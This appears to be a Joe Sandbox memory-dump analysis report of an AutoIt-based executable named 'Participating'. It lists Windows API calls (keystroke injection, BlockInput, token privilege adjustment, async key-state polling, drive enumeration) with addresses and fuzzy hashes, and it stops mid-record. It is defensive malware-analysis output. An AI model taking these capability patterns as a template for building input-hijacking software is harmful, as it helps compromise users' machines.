• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 72104398f5f7f5a0545e8d96334ee1364ccce1324b29aa9b5c7c9463912489dd
• Instruction ID: 8337941c2430c8f9bdf945ada24812e3029fd651180bd083048ab152bcae14bc
• Opcode Fuzzy Hash: 72104398f5f7f5a0545e8d96334ee1364ccce1324b29aa9b5c7c9463912489dd
• Instruction Fuzzy Hash: BDF0E5306003346AEB201666AC4DFFB367EEFC5765F000175F909E2291D9709D84C6B5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D4BC24
                                                                                                                                                                                                                                                                  • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00D4BC37
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D41B48), ref: 00D41A20
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00D41B48), ref: 00D41A35
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00D5F51A
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00D0075E), ref: 00D00D4A
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D6358D
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D635A0
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00D635AF
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D635CA
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D635D1
                                                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00D63700
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00D6370E
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63755
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00D63761
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D6379D
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637BF
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637D2
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637DD
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D637E6
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D637F5
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D637FE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63805
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D63810
                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63822
                                                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D80C04,00000000), ref: 00D63838
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D63848
                                                                                                                                                                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00D6386E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00D6388D
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D638AF
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D63A9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                  • Opcode ID: 25a0e2832d824af4e241db36052c67ba2bdc8962a2c6dd5d51d22a6bb00cb7a3
                                                                                                                                                                                                                                                                  • Instruction ID: 6e2f97e966ca55497fcc1e6bb232bfc9ddc6ae8d303daa17b16be657110a16cd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25a0e2832d824af4e241db36052c67ba2bdc8962a2c6dd5d51d22a6bb00cb7a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E023D72900205EFDB14DFA5CD89EAE7BBAEF48310F148158F919AB2A1D774AD41CF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00D77B67
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D77B98
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00D77BA4
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00D77BBE
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00D77BCD
                                                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00D77BF8
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00D77C00
                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00D77C07
                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00D77C16
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D77C1D
                                                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00D77C68
                                                                                                                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00D77C9A
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D77CBC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(00000012), ref: 00D77E5B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SetTextColor.GDI32(?,00D77B2D), ref: 00D77E5F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColorBrush.USER32(0000000F), ref: 00D77E75
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(0000000F), ref: 00D77E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetSysColor.USER32(00000011), ref: 00D77E9D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D77EAB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SelectObject.GDI32(?,00000000), ref: 00D77EBC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SetBkColor.GDI32(?,?), ref: 00D77EC5
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: SelectObject.GDI32(?,?), ref: 00D77ED2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00D77EF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D77F08
                                                                                                                                                                                                                                                                    • Part of subcall function 00D77E22: GetWindowLongW.USER32(?,000000F0), ref: 00D77F15
                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                  • Opcode ID: 037dc0bd67e1da8a9cc3ac75b2656102ddb21146543abab62019c78d21f605ea
                                                                                                                                                                                                                                                                  • Instruction ID: 1ad228915e1e641e2bb4a0fce5360ab8f4053b114ab3e08ad5ce85ee2d0e3446
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 037dc0bd67e1da8a9cc3ac75b2656102ddb21146543abab62019c78d21f605ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEA18171108301AFD7119F64DC48E6B7BBAFF49320F144A19F96AD62E0E771D984CB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00CE16B4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D22B07
                                                                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D22B40
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D22F85
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CE1488,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE1865
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 00D22FC1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D22FD8
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D22FEE
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D22FF9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 30cb06cf8f2aa6ed695ebf326d6af1d390b7cc4d2b5207132e30173ebf26646d
                                                                                                                                                                                                                                                                  • Instruction ID: 11e256147f93002765c16c7fb2ee92345e16e051575151365ec6c3720cb7fa33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30cb06cf8f2aa6ed695ebf326d6af1d390b7cc4d2b5207132e30173ebf26646d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4129830204361EFCB25CF15E884BBAB7A5FF54308F1C4569F899DB261C731A992DBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00D6319B
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D632C7
                                                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00D63306
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00D63316
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00D6335D
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00D63369
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00D633B2
                                                                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D633C1
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D633D1
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D633D5
                                                                                                                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00D633E5
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D633EE
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00D633F7
                                                                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D63423
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D6343A
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00D6347A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D6348E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D6349F
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00D634D4
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D634DF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D634EA
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00D634F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00D55532
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00D7DC30,?,\\.\,00D7DCD0), ref: 00D5560F
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00D7DC30,?,\\.\,00D7DCD0), ref: 00D5577B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D71BC4
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D71BD9
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D71BE0
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D71C35
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D71C55
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D71C89
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D71CA7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D71CB9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00D71CCE
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00D71CE1
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(00000000), ref: 00D71D3D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00D71D58
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00D71D6C
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D71D84
                                                                                                                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00D71DAA
                                                                                                                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00D71DC4
                                                                                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00D71DDB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00D71E46
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D70D81
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70DBB
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70E25
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70E8D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70F11
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D70F61
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D70FA0
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D42BA5
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D42BD7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                  • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                  • Opcode ID: 8135a0feee470394a661caf8586315899facf2085b7218f65003473ec1b2830a
                                                                                                                                                                                                                                                                  • Instruction ID: fd75845e8427b1f4ec273b8fb4f8717e0b222307f65d3b915fac148492c72a13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8135a0feee470394a661caf8586315899facf2085b7218f65003473ec1b2830a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0E1C0356043418FC714DF28C99187AB7E6FF84314B188A6CF89A9B3A1EB30ED45DB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CE25F8
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00CE2600
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CE262B
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00CE2633
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00CE2658
                                                                                                                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CE2675
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00CE2685
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CE26B8
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CE26CC
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00CE26EA
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00CE2706
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE2711
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00CE199C), ref: 00CE2738
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                  • Opcode ID: 2e3794069e029f23fc6b8d30c5bdf422bd273114c70fca91c66594c47ebcdceb
                                                                                                                                                                                                                                                                  • Instruction ID: d494433e65f729b621d4ecd5df885ab4c270ec0e6365db63aeaf4b92683440b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3794069e029f23fc6b8d30c5bdf422bd273114c70fca91c66594c47ebcdceb
